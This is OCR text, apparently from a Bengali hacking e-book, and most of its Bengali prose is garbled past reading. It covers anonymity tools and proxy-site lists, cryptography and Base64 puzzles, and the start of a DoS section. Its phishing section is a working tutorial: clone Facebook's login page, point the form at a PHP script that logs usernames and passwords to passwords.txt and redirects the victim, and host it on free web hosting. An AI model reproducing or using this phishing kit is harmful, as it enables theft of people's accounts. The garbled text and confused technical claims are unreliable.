RT 5 T®TR ^ITR I 3b|R RT 5 Tf% RR«T V3^jf% R^T RT^RR ^(flb^ (R^R <M|fl ^^(vs R 2 /^" ^R I Rl^Pr CS"^ ^Rf ST RRT f 

I i I 

| otr% ! ^tr c^ w Technitiuni MAC Address Changer ^r TMAC I TMAC rS^ri^ w Hr r^jt 3^ | 

L ! 


CCleaner rr^r r^t 


f CCleaner sr r^ rtrr RTfe 
| Hr r^r 3 ^ Hrr i 


©RRRTfR rHr , RRT tRJva RRT CRR TO RTOT Rl^T RRR TO CCleaner I CCleaner vb lSHRTvb RRR | 


I ^ tR^ r^r : I 

I I 

I I 

I RTRHt RRs (R^JRR RTRRR RT^RR 3R flR U^lfl RRR I 1RW R 56 ^ RETT'S ^fR RIR CR^JRT RfRFTT ^R fRC^TCR oIRT fRRTRR RiRRT Cs (Rs RCR 

| ( | 

p rir ! 3^ rto (giro <$r fR^ rrtr to TORTR 3RW Flash Cookie Remover I Flash Cookie Remover vbiSRRTvb rrf» \ 

I __ I 

I Hr rrr 3r » i I 

* ^ * 






PraTW 


SYlfR” f*T^R fRRiR R^Tf RRTR ^RT oTXRTR RRTR ^RT RR 


P/W/W/W/W/W/W/W/W/M/W/W/W/W/W/M/W/W/W/W^^ 
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p VPN (Virtual Private Network): f 

| 1 

I 3 4441(4 S?(4t4f\54T (vs Rtm 34tr ^4(4 i \3tr 44(^3 ft§(4 Hf4 444 3t i I 

I : 

| \s(4 Wi OT 34 44T4 44(vs (4(4 V/W ^j4fw 34tT 4*ifosl W ft(4 ^4T44T4 ^TflPr ^4(4 (TOT v3(4<HI$E 34 47^14 34 4T(4 ^4T44T(4 | 

| 4X43^ 4(4 (44 oHi 34bl f%W olf§f4 C^irSlfl 41474 | I 

• 

I 1 

I Rwpw VPN ?j(4T4 vblS'4(4Tvb f4¥ RlS" ftK I ^ 414<>[(4T(v3 f44 44(4t 3^ VPN 34 4*4f¥v3 v4fVpl'4M 3(44(431 It 3(44 3(4 47(4 ^ p 

I I 

I I 

1 

• Cvberqhost 

• HotSpot Shield 
. Pro XPN 

. Open VPN f 


I oTT4 tl47 m (4®1I RiPlC^ 41 5 f4T I tl4l Pi(^ (4®1(V3 34 344 f^^VPN Si 4 Pl3> Pl(b Pi^H I 

| 

. nVPN 


I fer^nr 


SwissVPN 


aivS'b'iifi 4^jr 


| sfr$m 34444 (44 fa?r 4W Tor Browser I 3tr wror 34 4\s <j>f% (4s 444 <m 47 , 331(41414 sat ws <yi4(vb7fi 47 i 3tr | 

p 

tw (4(4^ ^\3f4 4^413(4(4 I Tor vblS'HWvb 44Kv3 34 ^ifefw 3(44H1$E (4(4^ ^(4 fW f^4 4(4 



3Tlf4° f¥}4 Pu^U^P 444 44T4 ^i4T 4(44 4>P) 4414 44T 44 
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I HTTP Proxies and S0CKS5 : 1 

i I 

I _ j 

HTTP Proxies and SOCKS5 R^iRvs a^° Rim aa>t?T Rto - i vsR-qitvs a^t war<R rtR R^iRvs a^ aa^r Ib3«i | 

| I vsR 5RRTT W , ^fl1^v3, RR*E a^R ^sifjvs aa^ Plow a?T W OT 1 TRR v3 Rmf5'(4k Tf^R W aa^RRR ^ROlk afiRR | 

I I 

p ^ SOCKS SOCKet Secure I aR wkfS a^ r\R?t a?r c^sr ^ra^r a-Rm rir ^ I SOCKet Secure a?r « vst gw a?r 1 

I mm | 

| gsvsr a^R SOCKS5 I HTTP Proxie 3 RiR^fE a^x wrr ^^rifR i app Rvir a^R fw rrrt i 

| | 

HTTP Proxies and SOCKS5 a<T Ra? RR[R a^R RvsSjRT \3RRRtl? aR R^ Res' (h«1H I | 

• Alive Proxy 

• Hide My Ass 

• Proxy list 


$ RR\3 aR hfWfl avbt'l GsT ^jJR w asst 1 


p R^ aRr \3i?Rait& aR f5<^Mi \3 Rir Rrr ©a^R rr 3> v3RWft& rtcr rt 3Rvd rtrrtr spt rrrt rrRr rtr rir , oti ifjjw p 
| Rw rRer ( RitR) Rw at ^r aRr rt^ to rrss aRR Rfw i 

1 | 

http://www.niniacloak.com | 

http://www.hidemvass.com | 

http://qo-between.me I 

http://ir2.me 1 

http://rapidsurf.info | 

http://qo-between.me | 

http://yourownproxy.info 

http://proxv.co.cc 

http://iknownothinq.org | 

http://accessvouth.info 

http://buwk.com f 

http://UnblockFree.net f 

http://hillofbeans.biz | 

http://aptunnel.com | 

http://qoaheadmakemvdav.org 

http://lameproxv.info 

http://centerfoldproxy.info | 

http://proxylist.co 

http://sneakv9.com 

http://freesurfproxy.com J 

http://qoflyakite.org 
http://fastieproxv.com 

http://fastieproxy.com 

http://ihaveacunninqplan.info | 

http://schoolfreezone.com | 

http://proxify.net 

http://passmethru.com \ 

http://proxy2use.com 

http://0001.cz.cc | 


SttRx fr^T RRR w OTT RR RwM, 4 > w w 


rR° R^t r^itt ^rr rrr rR rrr rr 
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<tnPi+ snfo <t : f%pR nw -mm'SIjj *p«nfiS snfewr Raite® i 

I 

arromm a# oprar ^mfcrnmr mmm ftfax fmt?F i car mm wr mim 0 

P <K <K<K 


: 


: 

:: 

: 



§ srw 5% fipfirt fw ? 

9 — . 

, 

I 

| PopR ’'FT ']C c i c i 1% aFTOf <3 TOa# R>^5 vb'i|(.®H«H =TT 3 TO fl mX^TTCm^TO (bS® 1 lfl CTO 3 *$<t (m*ff 3<t>bf (ml ! aTmam \3 oPJT (pfpT aFTfm 

aUamiC'isl m\°>m f% Pi (a ailfl aji^u^fl (bS°i <3 , ^l°(.flP'i am ^7^1^ , v^Tm 'STT^T^T m ^a PopF^ m (®1 mim mm S^Pp^ ^>1(311 f% all ? mT ! 

| mTmFCm3 PlTO W ^1W my<$TCfl (aT oPFPT aim W am a#TO S^TOF mm ftpT“ 

| PyPr 3i?r mimim ” PHISHING” I ^froa fw # mm rni^r w c^(^ 

1 
I 

SIPKafam mm , 

% 

t 

| Phishing is a way of attempting to acquire information such as usernames, 

I masquerading as a trustworthy entity in an electronic communication. 

I 

t 
I 

| , 3m&r fmrnimcTOiy Icmjfmm ctotctof Prfem am ?ja to mm IS^nm cmm , arroTO^ , c#cs£ m# am mm am Irofm (rnmlfm aicm mfatm 

| cm^mr cm fmpr° mcm i 



passwords, and credit card details by 


I 


j 


j 


: 

: 


: 

: 

: 

: 

:: 

: 

: 

: 

: 


j 

: 

* 

! 

: 

:: 

: 

:: 

: 

:: 

: 

i 

: 

:: 

| 


| mro mrnia cmm , mjm am cwfcmr ISsnm .am H^nm cmm , armsm^ ItoPt mfatm cm3?iTm smy cmmpfm ^arcm aiFfm mfm cto^f am 

*ia$ ormca 3<F>bf malm cto - myrnmrm mfm amm aic^ PoPf° mcm " PoPf° mrmFmma aam^r ^cmlm 3im mrmtm msrcmr mm mrcm - i cmmcrn \3?" PiR^ ^cmlm 

t , 

s\ ^ SSuYifi m mn mr m^Pit <3 mrm w m^Pm ^ma jm^ cmmcm m^m fmm v3 ^mr mrcm 1 mmp mr^my 3t fmm aim tmm mr ! sfy 
| aim Srm ma c^ma <3^ mmm <3m&T m^itm cto cm&rm mrmcm mimim arm tamfSm 31m mm am ^fm mmm trnma tefm mmm 1 


| *flmm 5y f jym- ^ ? 

I 

1 

| 3a aiK'iiIba 3mE?T fmpF f%^ Sa>a)0: TOmm aircm 3m <mrm aFfw ^ fmm m ! mmTm\3 ar ainm mr^ i d mum amr fmpr° 3m aifw mm 

| TOcm\3 arnmat 3m amm to% 3 (mrm mwcmai \3 tefm mF fm ! ^rmcm& 3m crnm^ mfem ^rmr mrm , vt> mrcrnm ^ ^n^Fifm amm 

^jPiftm m^cmm mcm am ^cmrm S^fba mF I alt.online-service.america-online mrcmm am&r tm^rsFm amm am aiflw to 2 # 

| W mrnitc^ 1 aTtmm aay a^mSt mr#^ am ma #Pr^ am v3 S^af% ancmtmmT (a 1 America Online m AOL service a amm f%pR am 


:: 
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: 

:: 

: 

:: 

: 

: 

:: 

: 

:: 

: 

:: 
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| 3^T?T oTTpT 3?T Rife <MTWfl ! vs^WW TO (W $«&l'fl'0HB v3 ^Tf fe ( PHREAK) Wfe Wvs ! 

Phreaking 7s rcw ^srrferfe ^ tBfeRSRc4*H 3 ?t Rife fw tfe ww , 3 totttrt ! 3Bt 3^Bt mr° ! c*fe \ 

• W (3> Rw *1Hlft\3 W , <MfM \3TWT CbPl^RSPiC^^ 3^ R|R)S| RW fWR 4TT^ \3Wf ©Bfe Wit ft[W olf^WSITvBS'l \!>Mt (3>vB | 

| RPr ft^ w *wtt wr w i 3^ (?qi^ RRr *pr afen Bit oicw Br w* w ^liw ^ Bit Rw w “PH” 3^ w* *raw 
I “ISHING” &w a^ncsr csti^t fw Phishing) *Ri?i?r 5^# 5?r 3 


| , w^ , wr tvsiiPi oRkvs wfe 3^ RR)?i (B^fw v3 RN> (^ 

| 3 M I 


(WtB 


, CST ^)|(<K <1°11 Wl R 5 ^ 3 C^C^t R>Pl° ^|R>\ SF3 


I /^/t? SiW fl>M s f& e T ? tyWM \sT ? 

I 

sL 

fe, PpPk 3^ ftf%W ^(W ^®T oTK^ I ^ 13^1 Onl^ (®lt f% f% ! 

| 

• Phishing : whR RRr wt 3 t ^yiBfe <wi i 3^3 cw RifeBiRB / w ^iw ^r i RpRr w 3 t ^nB^R 3 <y w 1 

• Spear Phishing : 3^fB RRB §ft BtrB w RRk wi Spear Phishings 1 

• Clone Phishing : 3Br w , ^K^it c^ GbfeR <pra?iT 3 ^Bt Rfe ^fer 3 ^ cm / cwys 3^t 3 ^Bt tfe crm w 3 otkw ^3 

( R-*W<i , V^RT ^sTTR ) ^ 3BTSv 5" Rf¥ Br WlfT 3^ WT Rrft^ f^ 3^ ^ ^5T C^v3?n 3JW 1 


I Fron- FacBbook <updatei-nwiqhnbz@facebookmail.com> I 

Sublecl: Face book Account Update Sk ■ ■ r ^_ 

Date: October 28, 2009 4^0251 PM PDT / \ ¥ =1^j <?&** ! facebookmail.com ! 

To: Tom O'Leary f[Messaging Times)) H 


face book 


Dear Facebook user, 

In an effort to make your online experience safer and more enjoyable, 
Facebook will be implementing a new login system that will affect all 
Facebook users. These changes will offer new features and increased 
account security. 

Before you are able to use the new login system, you wilt be required 
to update your account. 

Click here to update your account online now. 

If you have any questions, reference our New User Guide, 

Thanks, 

The Facebook Team 


This message was intended for tom@messagingtimes.com. 

Facebook r s offices are located at 1601 S. California Ave., Palo Alto, CA 94304. 


Update your 
Facebook account 


Whaling : cm 3 ^Bt ^rrRr 3 ^ w ^ t^p^B wr?r ^RbiRvs w srrf^ 3 $ ^ 1 

Link manipulation : pm ^RR^m fitw 3 ^ <pma fw ww ^mih?i c^c^fi s^\ « ^ Bw Link 

manipulation^ 1 m www.facebook.com 3 ^ Link manipulation ^ w www.facebOOk.com [ 3^bt "o" 3 ^ 3^bt 
"0" (zero) <s<w w fe tB ! 


^yrf%° Rc^ct 5 ^ w \ w 
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-O ncji./Vlbaccion.nec/ 


Loflim | facetoo« 


icrviws- W'-l np _t !cjd5 # F*t«&ook it y Drlrcious !1 yft6ddtl.il -/ f jmbir It >• fres-s Thu y FflendPced It ■/ Tumblr ll y b-LIv y 0i5nfii r >nitap-jper 
TCTcchCf^jncfi A C? TCT*t*Oumchi *■ Add fir. ^Goo^le ftcatfc-r ifiSlJ ^ fouriquari Qtsflirt r,icftlMM5^ 


facebook 


faccbovk hefps you tonnect and. share with tiro people t« your tife, 


ratebook Login 


Not 

Facebook 


CnHlt 

p-asuYMjrd: 


Q| H6JT>«nbcr me 

or j m r up for facebook 
I nrrcA your paiiwartf? 


Filter evasion : ^rf^r csn^sw ar torto RRk tot?t tot to & IVSia i Jt troTO gf jtstuto tot <Sw& gf jfser 

to^to tout RRr to to Sw Filter evasion to i 

Pop -up : j<fS r stRS f%RS tom i jto to to ^#r j^St to oift jut tototo toR^t tovs sprt cto toto vtot crow 

tovs to RRsva to to jSt Pop-up phishing I 

Tabnabbing : jR *ttow RRrx j wr toR j^tR^ tro sto tom vsto %to ctoihi j^St Sto toS Rrttou^ RRrx ^nRs j 
to ! 

Evil twins : j tovs totc to cto toto RRr jSt ! Rf%w toR^ cto ^ (wrur toi^R to , toto ar ta j^St v 3 ?tiR^tR cro feR to 

I TO«T R \3R v3?n^Plt (5TFT 4>(£l TO TO^T TO vsTO (^CpR SYRTO TO TOtTO ^TT §R TOT <K?I I 

Phone Phishing : jStu wgy jTO RRr tot i toto RurR^t to w toStRR& tottR^ toSto ctoto toutto tot ornate 

ftUTO R)<p>fb^l R> TO ^TO TO° vsTO (?H^ oFsW FTv^ 1 # ^TTUT vsW TO vgsjy (^ | 

SKT foviw C¥ Gnft Git ^ R)R>)b TO/I~ 197 C577W ^77/TO J7^T ^77#^ ? 


TO^TO TOI 9 ^ H^T ^ , fepR TOT UTTO 3^ TOT ^ vsW C^fTO^TO^ ^TfWfftTOR 5 #f&f% 

RtPstoto^ Transport Layer Security (TLS), Secure Sockets Layer (SSL) sm ^ ^Tf^rrft f^^srr^t <m\a ^ 1 

Sc^KTO S"TO R\3fl <^(.fl J^bl ^Rb C^" ^ifCRc^b Cn\3?JT I ^(.vbb <Pfll S\^\ TO^T 2 jfTO' to aiS'b'iifi J OTCTOUTT ^TWCTO PpPt° >lRb (^ TOT^ 
TOtvs S TTO J^“ ¥?T“&?T oTO TO \3 W I tTO vTOTO \3 oTT^Tf^T Rr^T\ 3 TOT^nsT TOTOK TOUs 5 TKTO I vTO TOT Rcbfl fe T gT&T « ; W 

^®r S 


f X o 


H 


TF 




friRi <c$l ^TS ^T C^^IM ai^sr ^sT^TOilFT^TfTOT >i!^b | C^TTOK^TT3T& CTOTO >iHTO"!!! 


1 3 https J www.facebook.com 

•i'VM! c^l?Jlei ^T^iT^Wt?T HTTPS T^»Jl | HTTP 51?> T "$I«prarw ;) 


^^TTTO ^f% 'iCB'rCvs UT^TTOT WT#T C^W TO^T oTTTOITO sU'S'^'I'fl TO TOTCTO I TOTO?T J^" TOT Rl¥ &T W TO=T I W TOTO^T 

c\ c\ c\ c\ c\ 

^Tvs Rr? St f% ^jtto Ri¥ =rrf% ut^jus cror Ri¥ 1 fro Rr? ^to^tot ^Jj^tto ^jtRt to^ tottoto orr 5 TU5tSv5' ^ifiMb Rr^yRrf? to^tw 

TOV3 1 


^yrf%° Rt^t Rt^to tot^ tot ^tuto tot^ tot to 
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S03E iSHM SSL dMW Jw jy«b ? 


voJlR \^CV3? ^(*1 (®Tt 3I?T CTOW 'Si«li ^" c f®TT <Pfll 

I wPr c^itoiw? wSt toto w i 


I 31^ C^Mf|5 ^°TOW TO sib(vf)>llTOT TOTOW ^flC'l TOW WT [bS«1|fl CTO TO 


I 3TO^ TOC^T TOl^T TOfTO WWpT 3<Pb| PpPr dl?b 1MIW S 1 I Shl^flC^W vOJHfll (TOTTO 3^ 3<1>b| RpPr dl?b TOTOW ^ 

I ^ ^ ^ ^ ^ ^ 

1 TO*T ! 3^*1? WTTOIW hfWfl 3<1>b| &|R?° \3 3<1>b| CTOPT§«T I Sffl vdMi v^Hfll fe (A|pb° 3 CflR>H°3?*IM <Pfl<l I <3 

| TOa OOOwebhost TOTOTfi tow& c5Tpfc 3<r sprt i OOOwebhost 3 cafectror tocto tiro TOp 3 ^ fro? i froTO fwro to wfectror 

| CTO vOJHC'l TO \5T&T fTO CflftfiC^IM I 3TO ?OI?<1 CofflPpC^TO TO[JT I 






tC 


OOOwebhost.com 

better triers pc id Ii«1»ik. 


Order Free Web Hosting 


I want to host my own domain (domain must be registered already) 

WWW. lyo-urdamain.com | 

or, I will choose your free subdomain (recommended) 
www | j ..comlu.com 

Your name 


Your email (account details will be sent there) 

i i 


Password (at least 6 symbol s, both letters and numbers) 


Type password again 


L 


Type 7 words that you see in the image: 


G Home 
|J3J Vi ew Al I Featu res 

Free Domain Hosting 
% Free PHP Hosting 

Free Hosting with MySQL 
Jjs Free cPanel Hosting 
“ Website Builder 
, k . Fantastico Autoinstaller 
III F requent Q u estion s 
Web Hosting Reviews 
Website Templates 
Affiliate Program 

Visit our Forum 
Contact j'R eport Abuse 
Members Area 


*?r to*t: 3to?t www.facebook.com 3 tot 3to to^t cto 3 wp^t 1 3$r f^roro to?i*t w to tot 3to 3Sr cro^ 3 ^ TOt*r cto 
1 3to^ 3^ cto 3 ^ ctotott fii^b (S 5 ^ <k?i View page source 3 tiro to^jt 1 


facebook 


Facebook helps you connect and share with 
the people in your life. 


X A 

A X 

X 


X A 
X 


Sign Up 


Back 

1 always wl be. 

Forward 


Reload 

ne: 

Save *s_. 

ne. 

Print.. 


Translate to English 

ail: 

Vintage .nfo 

ail: 

»pec\lcmcnt 

rd: 

I am: Select Gender: 0 


cw ura 


rydo I need to provide im 


Year: [*] 
of brth’ 


Create a Page for a celebrity, band or business. 


Englrfi (US) Esparto! PoMugjfe (Brasi) Ft angers (France) Deutsdi IlaUno vj*i> *~(7«) 3*8 


TOifro fr^r Pkvjw tott tow www tow ^to to 
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vs>r 3T*t : View page source si fww rrrr fRi&R fteR rvs i^tr ws i jrtr 3t Sir jr rr Ctrl + A fRiR% 

3R° 3Rt?T (RT& RHvS - <3 C^R? I 3RTR CRv3 R^R Login.htlll RTCR I 


chtml lang-"en" id-"facebook" class-"na_ja"> 

<headxmeta charset="utf-B" /xscnpt>function envFlush(a) (function b(c)(for(var d in a)ctdj-a(d);}l£(window.requireLazy) 

(requireLazy([’Env 1 ] ,b);}else(Env-window.Env|| {} ;b(Env);}} 
envFlush(("ffidl":"rWCXDifILFHS7LIbjOaKmQ","ffad2":"ohixvirQ- 

dlzQ96K3PPRmA",*ffid3":"SFJDdVRzR3MwLVZndOplUOc3eMJKbXVS","ffid4»:"lAoQQWycGlkEwtTHIJLg7g«,"fiver":63063,"user":"0","locale":"en_GB","method":"GET","svn_rev":5197 
61,"vip":"69.171.234.64","statlc_base":"https:\/\/s- 

static.sk.facebook.com\/", "www_base": "http:\/\/www.facebook.coan\/","rep_lag":2, *fb_dtsg": "AQAOMZeZ", "ajaxpipe_token": "AXgEUkpGZAo9zjJN", "lhsh": "OAQFq_Kry", "track! 
ng_dcmam": "https :\/\/pixel. f acebook. con", "retry_aiax_on_network_error": "1", "htmlS_audio": "1", "fbid_emoticons": "1")) ;</script><script>envFlush (("eagleEyeConfig": 
("seed":"lWMc")));CavalryLogger=false;window._scnpt_path = "\/index.php";window._incorporate_fragment = true;</scriptxnoscrlpt> <meta http-equiv-"refresh" 
content-"0; URL*/index.phpJstype-loiarqp;lh-Ac9eUNL-ME9yKz3Giamp;_fb_noscript-l" /> </noscript> 

<neta na»e-"robots" content*"noodp, noydir” /Xmeta najne*”description" content*" Facebook is a social utility that connects people with friends and others who 
work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos and learn more about 
the people they meet." /xlink rel—alterr.ate" media— handheld" href— https ://www. facebook. com/index. chc?styce=loiaac;lh-Ac9ePHI.-itE3YKz3G " /xtitle>Welceme to 
Facebook — Log in, sign up or learn more</titlexlink rel-"shortcut icon" href*" https: / /s-static.ak. facebook. com/rare.oho/vi/r/a9J99v3_se1 . ico " /xnoscriptxmete 
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8 s / RPTI 3RTR Pl(.b?l (R\3RT (RW fi? RTIRRt? «lv£«l CRT&' p HTv5' \31RR RIR RfR (R 5 !? R^R 3R° 3lfftR phish.php RTCR (Ro R^R I 


<?php 

header ('Location: http://facebook.com '); 

= fopen("passwords.txt", "a"); 

foreach(Array as => ) { 

fwrite(, ) ; 

"=") ; 

); 


fwrite(, 
fwrite(, 
fwrite(, 
} 

fwrite(, 
fclose() 
exit; 

?> 


'rn" ) , 


'rn" ) , 


CT RTR I JRTR login.htm (R \ 31 RR R^R (RT^RiW RiC^I RRRf RTtt? RIR Si fib Si I < 3 RR Ctrl + F (RR 

action=”https://www.facebook.com/login.php fpp i at &r <s login.php srpmj phish.php ca« 

R^R I 


bis rpt : 3rtr http://members.OOOwebhost.com/ 3t tRW rtr si^k siw^ rkr rtrtcrt rtrrr St s\ rr ^r 


Rlf%° f*T^R few RRT RRTR oRTR ^sllsl ^iRT RR 
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Please login to your account 


Your email 


gmail .com 


Password 


Enterthe symbols you see in the image 



(reload image) 


| Submit | 


Forgot password or mayde forgot email? 


w qnr : ws ew Cpanel 3 rm , File manager 3 ^ 


View FTP Details 



P 


another File 
Manager 


Disk Space Usage 


Backups 


I *n*T : 3^ Public_html 3 fww 3?r ^rar otr gtft 3 3^x phish.php 3 Login.htm ^ i wt 

| m I W (2T oTRW f%Pl\9 R oTI^W teft fapR CW <3 BFT W * 


g] 


Language: English fr]j 


Directory Tree: root / 


|Mew dir| |U-e.v file| |uplcao| |Java Upload] 





Transform selected entries: j Wove | | D elete| |Ren B me| |Chmod| 

All Name 

Type 

Size 

Owner 

Group 

Perms 

Mod Time 

Actions 


Si Up ■• 

1 QH! public html 

Directory 

4096 

a7561450 

37561450 

rwxi-se-^ 

Dec 3 12:48 



0 □ .ftpquota 

FTPQUOTA File 

7 

37561450 

37561450 

rw-- 

Dec 3 12:52 

View Edit 

Open 

J DO NOT UPLOAD HERE DO NOT UPLOAD HERE File 

0 

37561450 

37561450 

iwr-i— 

Nov 30 11:33 

View Edit 

Open 


*73*7# 33 , 377 ^ ((97 IS35/SW v3 W /3>o/W 


? X 


http://www.yoursitesadress.p4o.net/lol.html [ w 3 ^or 5 t£ 

1 PPp - ] <3?R$ <3 : TR 3^° <TR2^r <hflTO (T^IRT 5 TT31R 5 T PlCbfl IbCafl ^vd tjRT ^ 


yoursitesadress 3?r ^rpr^f (vs ^strrr teft cstct^t 3?t Rw 


charset_test = a,-i, A ,a f - 
version=l .0 
return_session =0 
session_key_only =0 
t r y rn.mi= 1 
lsd=Cgt 3 b 
ernai 1 =. 
pass- 


Tnf%° f*r^jr Pk^u^ ^ w \ wr otrr i<^ 
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^Wfl ^VD f^T ftf*R f^RI^T fwif^vs oJK'llb^il I 


^yif%° f*r^jr ^w\ ^fiifi <p$\$ ^ 
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<)J||Sm> snfo ^ vb 
IHStBiRw 


Cryptography fc? a&r >£ 1 oim wf w? 


Hacking m sSr Rwh [ w w :/ ] mm cm basic \m *rr Sw ^ifm calculus wr 3 <pjt\3 mm 

mm «n mm hacking 3 3 m^rf^r ftm f%\ w mm *rr ^ ^rrmw iiiw basic hacking grammar mr w ! 
oiTPr ^ fSS^r Sr (\3 <£tr w ^rfw hacking grammar orrmm m^r CTm mil 



miiwiimmij 

I ■??[« -alHIfl (SftW «TM 

&T HlfH 'SW srrfSr a? \J> Bt 


snw snR CRYPTOGRAPHY, ENCRYPTION a DECRYPTION fer _ 

<SilC*i*1 v9(.<] -Mis!| ailUI'l ^Tf VSICUI W <lR STffsr Wlblijfb pipe's oIiHR -qp Rft <Kfl ,3^\ K-HI^T 3? IbS^ R 

RW?I PJTSHf? SfflMfl J<P'Si li 1 Pl*H\93 5t?T -NK<W M 

Cryptography : wikipedia aia 

Cryptography (or cryptology; from Greek Kpimroc;, “hidden, secret”; and ypacpeiv, graphein, “writing”, or -Aoyla, -logia, 
“study”, respectively) is the practice and study of techniques for secure communication in the presence of third parties 
(called adversaries). 

sNft jfw’f war cam <n «j4iwra a^1% cryptography ^rr 5?r i akr srmr akr IRm Rem i a wm graduation certificate 3 
cayrT 5?r i 

Cipher: <?r algorithm mm m ^tSt ^rfm ^tSt mr cipher m i 

Encryption: cm algorithm mm m ^Sr tstSt cf m1% cf encryption m I ttcm m m Caeser Cipher . jSt 

cipher, Shift Cipher ROT-13 Rotational Cipher m ^amr i m english alphabet 

oim^pf Rhvi'h m mm tstSt c^ encrypt mr i 




M N 0 P Q 


P Q R S T 


..- JULIUS CAESAR 


l a t/A i wu rm mni i 
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Up ^T° W 

i 

: 

i at (\5 crovs wtot wro w alphabet yir of ^ to 3^wr tow i wfft M (^ P , N (^ Q ^ tot tow i 3$ TOife 

vojo^Hfi^r tot ^frow trow to encrypted w Sr c tow toto ? encryption to Sovn i 


: Decryption: encrypted to of w Cvs encrypt tot tow to totto Sw^t tot oWHfK tot w&f w plain text of $tro tow 
| 3^f% of Decryption to i decrypt tow wnt correct key ( encrypt tow to 3 ) tow i correct key to w£t Sw 

tow wro of statistician wto tow 3<f fSfro tot -3tow ! w&r cwt^fS totfftR :/ 

I 

35JWT f%cT spf ^TT I WW3 ff 1 ^ 3(TO'i°5N v5TT?T \3 (TOT 0# -=■ 

I 

I 

S Cryptographic Hash Functions: f4p£Tsnl44 srrr ww . 34 ft fmfi?i4 *r^1% m?r tow 34 ft tstBt/ plain text TO4 ?i 4 / 

t 

arbitrary block of data -ftr ijmslms 54 i to ^rr^r^s to 1w encryption m fw encryption 4?n?r *ra1% i 


Input Hash sum 



| Hexadecimal: hexadecimal to* 34 fr Cryptographic Hash Functions I ppto w w 5i 4 vr«$'ra <mmn?r 4 m 54 mkr 

I 

\ encrypt/decrypt 44m tot i s>t> frt 4nt4?T4 tot 0-9 a A-F I Jkr 34i?r 128 bit / 16byte 34 hash value . Jt4 Base-16 a to 

p 

TO TOF i to orw TOfro hexadecimal hash value to MD5 I 

: 

1 

| Base 32 :: Base 32 to \ 2 >} tow^w jst hash value I to A-Z 3 2-7 tow^w ^tt tofw tot f?t i sm; r SwfW to 
d41d8cd98f00b204e9800998ecf8427e 

; 

; 

I 

| Base 64 : Base 64 orTOv3 3f£r Hash value I to A-Z , 0-9 a^\ ff^ f^m fw toto tot s?ti Base 64 wtto “=” wr ew f?t , 
| Swr os 1 B2M2Y8AsgTpgAmY7PhCfg== 

I 

4 

i 

| Collisions : ^ Sr wwrw wwrt hash value to 3 ff tow encryption to \s*w vw server a frorfro ^ft w i 3 $ ferf% of 

collisions toit ^ 1 wito hacker cro sprt wfltfw i vswr 3 &tcof \ 5 www “God mode birthday attack ” to 2 nw i collisions to 
| server hang (To crash 3 tot^ w i ^tto^t os 

1 to ABDUL encryption to: os 9b306ab04ef5e25f9fb89c998a6aedab 

tow TOpr FREAK TOft^ encryption to os 9b306ab04ef5e25f9fb89c998a6aedab 


| vTOf to wr to CoTO®r encryption 3 ^ tow i s \ITO collisions to ^?ti wtoto to^ to to server s \ at toto ww 

| OoWf W?T I 

1 

I 

SALT: Salt to hacker cw wit i froro AI upgraded server SALT ct^mt to i (TOW wU to ^fw tow Sito 

i 

| encrypted 3^ cro to tow^w (To to otto of SALT/ SALTING to i SALTING tot w cto w£t Decrypt 
| tot 3orowt toto O^'oto ^ “Isf5651etg64sfg” to 3TO encrypted data.3^ 3^ c*w a ^#r to ^ Sr tow%w tot ud7 to 
to o^ \3TTO v3&[ decrypt tow to ^frow tow to w i tot Super Computer 3 3ww w ! 

i 

: 

u 

| w&f decrypt toovs to to toto i ^ ft encrypted wSr crow » to w decrypt tot 3tow 3 wn ft towws w 
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I 3AcTBJCzggwY3LCyzIhJBJhtzewSA+5dyuQhaKcDzI3agWCRz+YC30ZMCdyG 
! FERON-74 -> GILA 7 


aw^ aw BASE-64 


f f 

spfft f5 ^ wf cro \st aro BASE-64 a encrypt tot toiw i tow to BASE-64 oro am encrypted TO FERON-74 | 
| a totw encrypt tot stto i caiTO to GILA 7 a encrypt tot stto aw^ TOw encrypted TOr torw aw TOf tti aw a!TO | 
1 decrypt totvs to torw cf encryption aw wm tot Rff vstcw wto wto to i aw TOf cf aro GILA 7 a decrypt 1 

1 S 

totvs to i tot to to to tt wrfw i TOf encrypt/decrypt totw spry amwr to to TOr http://www.crypo.com/ 

| WW5TW TO WrfS a# (^oT[3JW TO ^ TO I 

I | 

| s) srr^ST&r sNft 3AcTBJCzggwY3LCyzIhJBJhtzewSA+5dyuQhaKcDzI3agWCRz+YC30ZMCdyG awr strwt GILA 1st | 

I decrypt a^ww i decrypt <ratw pr tstSt a# «t uRC0CTM6qvsPRnD0NKSFBT13Azy8RZRgNLsbPlMvPc74 

1 1 

I 

I *) jwtw jStw FERON-74 a decrypts ait YWlpJTIwZWtqb241MjBiYW5nbGFkZWhp I 

i i 

i i 

p p 

«) aWrwwra i ara decrypted ^iSr asia BASE-64 a decrypt <ratwt ;wiwt srm tbt&t St catw wiwi anww aSit aw aaa/ terminal 

| hash value. <fwt wr wiR>pt ; aT s p decrypt <Ftw caPr sim ^iSr Sr Q3 | 


decrypt <fwtw aw strwi ait ami ekjon bangladehi! 



a^jwt faw cryptography aw ^aw 

f 

I /encryption sequence <s fata faw i 


awwitw awanfw basic wiwwt ^twi i a*iw srrfa fats } Sr encrypted faw i correct key 
srrawiwi cstfr a>tw ca^w isn \5 TBt sjftt decrypt a^wps arcsw f%wr ? aiwtw comment a v5<rw fw^w i 


[encrypteddatal] s+/YrnabNF/0q699ALypuvMf6RsnebxWuTlVBYwjAuDprL8veX9DQcs+qZ7jr6/b 

1 I 

I I 

I Correct key : MEGAN-35 -> GILA7 ->FERON-74 I 

[encrypted data 2 ] 

1 k2nPkvWydlnxRMO/jZj 1 nMmqmvOPlMmxn+fxnxjhlKjGm29dn 1S1 lvXUelWyjuKXo2C7exiyo/i7oLjRj20AjLiwofOz I 
| lxlYk2nPktGdklj6ju07RKS6fuK8ode5 f 

I ! 

| Correct Key : BASE-64 -> TRIPO - 5 -> HAZZ-15 -> MEGAN35 | 

| ^Tlf%° f*T^W TOTW ^f% TOTW W | 
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«diPi 4 ■ s: DoS ? DoS sitiSff c^r R>©k<i ? 

<ulH4 5T(1%^ a?r <w ^ a<R a ^ srprm sitptmt 4?i<r DoS , DDoS attack asjprr Ptt?r <jfi«tsisi RaiRivs ®r i 



3*pt 3?r DoS fSiPpr Sr f¥ ? DDoSa4? DoS f4 a^t 


mmmmmm 

r - ,Y 
IflMb [ ^Ibl^lfl J 


HUM i 

3^t?T RiRfe Ws 

3C?T ^TT?T 


DoS ^ Denial of Service I DoS sl 3^St prf*r toi s \^t 

